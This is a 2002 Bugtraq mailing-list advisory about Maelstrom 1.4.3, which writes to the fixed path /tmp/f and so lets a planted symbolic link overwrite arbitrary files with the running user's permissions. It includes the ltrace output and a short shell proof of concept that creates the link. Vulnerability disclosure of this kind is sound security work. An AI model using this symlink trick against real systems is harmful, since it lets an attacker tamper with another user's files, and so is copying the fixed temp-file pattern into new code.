Bugtraq mailing list archives
Maelstrom 1.4.3 abartity file overwrite
From: "Andrew Griffiths" <andrewg () tasmail com>
Date: Sun, 20 Jan 2002 20:16:30 +1100 (EST)
Program: Maelstrom Version: 1.4.3 Distribution: RedHat 7.1 When trying to break stuff, ltracing Maelstrom showed the following: fopen("/tmp/f", "w") = 0x08081f58 fprintf(0x08081f58, "Main program = %s\n", "Maelstrom") = 25 fclose(0x08081f58) = 0 Which made we wonder if it followed symbolic links, by doing [andrewg@blackhole andrewg]$ rm -f /tmp/f; (umask 077; echo bla > /tmp/bla; \ ln -s /tmp/bla f) at which point I ran it again, and when I did cat /tmp/bla, I got Main program = Maelstrom Conclusion: -=-=-=-=-=- You can overwrite arbitrary files with the permissions of the user who ran it. Of course, this won't work on systems that have linking restrictions in /tmp. Fixing it -=-=-=-=- Remove the code that does the above. -- www.tasmail.com
Current thread:
- Maelstrom 1.4.3 abartity file overwrite Andrew Griffiths (Jan 20)
- Re: Maelstrom 1.4.3 abartity file overwrite Chris Gragsone (Jan 21)